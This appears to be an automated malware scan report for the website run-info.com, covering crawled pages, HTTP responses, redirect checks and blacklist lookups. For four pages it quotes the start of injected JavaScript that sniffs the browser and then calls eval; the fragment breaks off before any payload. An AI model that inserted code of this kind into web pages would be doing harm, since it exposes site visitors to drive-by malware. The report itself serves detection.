Scanned pages/files
Request | Server response | Status |
http://run-info.com/ | HTTP/1.1 301 Moved Permanently Connection: close Date: Wed, 23 Apr 2014 13:27:15 GMT Location: index.html Server: Apache/2.2.17 (Unix) Content-Type: text/html | clean |
http://run-info.com/index.html | 200 OK Content-Length: 13090 Content-Type: text/html | malicious |
Malicious code - confirmed by antiviruses (see below) var browser = new Object(); function getBrowser() { var b = navigator.userAgent.toLowerCase(); browser = { safari: /webkit/.test(b), opera: /opera/.test(b), ie6: /msie 6/.test(b) && !/opera/.test(b), ie7: /msie 7/.test(b) && !/opera/.test(b), msie: /msie/.test(b) && !/opera/.test(b), mozilla: /mozilla/.test(b) && !/(compatible|webkit)/.test(b) }; } getBrowser() ; var urlVar = "http://www.run-info.com"; eval( Antivirus reports:
| ||
http://run-info.com/js/jquery-1.4.2.min.js | 200 OK Content-Length: 72330 Content-Type: application/javascript | clean |
http://run-info.com/Portfolio | HTTP/1.1 301 Moved Permanently Connection: close Date: Wed, 23 Apr 2014 13:27:18 GMT Location: http://run-info.com/Portfolio/ Server: Apache/2.2.17 (Unix) Content-Length: 238 Content-Type: text/html; charset=iso-8859-1 | clean |
http://run-info.com/portfolio/ | HTTP/1.1 301 Moved Permanently Connection: close Date: Wed, 23 Apr 2014 13:27:19 GMT Location: index.html Server: Apache/2.2.17 (Unix) Content-Type: text/html | clean |
http://run-info.com/portfolio/index.html | HTTP/1.1 301 Moved Permanently Connection: close Date: Wed, 23 Apr 2014 13:27:19 GMT Location: index.html Server: Apache/2.2.17 (Unix) Content-Length: 0 Content-Type: text/html | clean |
http://run-info.com/test404page.js | HTTP/1.1 301 Moved Permanently Connection: close Date: Wed, 23 Apr 2014 13:27:20 GMT Location: index.html Server: Apache/2.2.17 (Unix) Content-Length: 0 Content-Type: text/html | clean |
http://run-info.com/services | HTTP/1.1 301 Moved Permanently Connection: close Date: Wed, 23 Apr 2014 13:27:23 GMT Location: http://run-info.com/services/ Server: Apache/2.2.17 (Unix) Content-Length: 237 Content-Type: text/html; charset=iso-8859-1 | clean |
http://run-info.com/services/ | 200 OK Content-Length: 6917 Content-Type: text/html | malicious |
Malicious code - confirmed by antiviruses (see below) var browser = new Object(); function getBrowser() { var b = navigator.userAgent.toLowerCase(); browser = { safari: /webkit/.test(b), opera: /opera/.test(b), ie6: /msie 6/.test(b) && !/opera/.test(b), ie7: /msie 7/.test(b) && !/opera/.test(b), msie: /msie/.test(b) && !/opera/.test(b), mozilla: /mozilla/.test(b) && !/(compatible|webkit)/.test(b) }; } getBrowser() ; var urlVar = "http://www.run-info.com"; eval( Antivirus reports:
| ||
http://run-info.com/portfolio | HTTP/1.1 301 Moved Permanently Connection: close Date: Wed, 23 Apr 2014 13:27:24 GMT Location: index.html Server: Apache/2.2.17 (Unix) Content-Length: 0 Content-Type: text/html | clean |
http://run-info.com/about | HTTP/1.1 301 Moved Permanently Connection: close Date: Wed, 23 Apr 2014 13:27:24 GMT Location: http://run-info.com/about/ Server: Apache/2.2.17 (Unix) Content-Length: 234 Content-Type: text/html; charset=iso-8859-1 | clean |
http://run-info.com/about/ | 200 OK Content-Length: 10022 Content-Type: text/html | malicious |
Malicious code - confirmed by antiviruses (see below) var browser = new Object(); function getBrowser() { var b = navigator.userAgent.toLowerCase(); browser = { safari: /webkit/.test(b), opera: /opera/.test(b), ie6: /msie 6/.test(b) && !/opera/.test(b), ie7: /msie 7/.test(b) && !/opera/.test(b), msie: /msie/.test(b) && !/opera/.test(b), mozilla: /mozilla/.test(b) && !/(compatible|webkit)/.test(b) }; } getBrowser() ; var urlVar = "http://www.run-info.com"; eval( Antivirus reports:
| ||
http://run-info.com/contact | HTTP/1.1 301 Moved Permanently Connection: close Date: Wed, 23 Apr 2014 13:27:25 GMT Location: http://run-info.com/contact/ Server: Apache/2.2.17 (Unix) Content-Length: 236 Content-Type: text/html; charset=iso-8859-1 | clean |
http://run-info.com/contact/ | 200 OK Content-Length: 8088 Content-Type: text/html | malicious |
Malicious code - confirmed by antiviruses (see below) var browser = new Object(); function getBrowser() { var b = navigator.userAgent.toLowerCase(); browser = { safari: /webkit/.test(b), opera: /opera/.test(b), ie6: /msie 6/.test(b) && !/opera/.test(b), ie7: /msie 7/.test(b) && !/opera/.test(b), msie: /msie/.test(b) && !/opera/.test(b), mozilla: /mozilla/.test(b) && !/(compatible|webkit)/.test(b) }; } getBrowser() ; var urlVar = "http://www.run-info.com"; eval( Antivirus reports:
| ||
http://run-info.com/js/global.js | 200 OK Content-Length: 130 Content-Type: application/javascript | clean |
http://run-info.com/blog | HTTP/1.1 301 Moved Permanently Connection: close Date: Wed, 23 Apr 2014 13:27:26 GMT Location: http://run-info.com/blog/ Server: Apache/2.2.17 (Unix) Content-Length: 233 Content-Type: text/html; charset=iso-8859-1 | clean |
http://run-info.com/blog/ | HTTP/1.1 200 OK Connection: close Date: Wed, 23 Apr 2014 13:27:27 GMT Server: Apache/2.2.17 (Unix) Content-Length: 158 Content-Type: text/html | clean |
http://www.ccgp-shanghai.gov.cn/myhall.do?method=forwordto&url=/myhall.do?method=viewshop@@supplier_id=08001156 | 200 OK Content-Length: 0 Content-Type: text/html | clean |
Malicious Redirects
First query (normal visit):
GET / HTTP/1.1
Host: run-info.com
Result:
HTTP/1.1 301 Moved Permanently
Connection: close
Date: Wed, 23 Apr 2014 13:27:15 GMT
Location: index.html
Server: Apache/2.2.17 (Unix)
Content-Type: text/html
GET / HTTP/1.1
Host: run-info.com
Result:
HTTP/1.1 301 Moved Permanently
Connection: close
Date: Wed, 23 Apr 2014 13:27:15 GMT
Location: index.html
Server: Apache/2.2.17 (Unix)
Content-Type: text/html
Second query (visit from search engine):
GET / HTTP/1.1
Host: run-info.com
Referer: http://www.google.com/search?q=run-info.com
Result:
The result is similar to the first query. There are no suspicious redirects found.
GET / HTTP/1.1
Host: run-info.com
Referer: http://www.google.com/search?q=run-info.com
Result:
The result is similar to the first query. There are no suspicious redirects found.
Safe Browsing / Blacklists
Query: http://www.google.com/safebrowsing/diagnostic?site=run-info.com
Result: This site is not currently listed as suspicious.
Result: This site is not currently listed as suspicious.
Query: http://yandex.com/infected?l10n=en&url=http://run-info.com/
Result: run-info.com is not infected or malware details are not published yet.
Result: run-info.com is not infected or malware details are not published yet.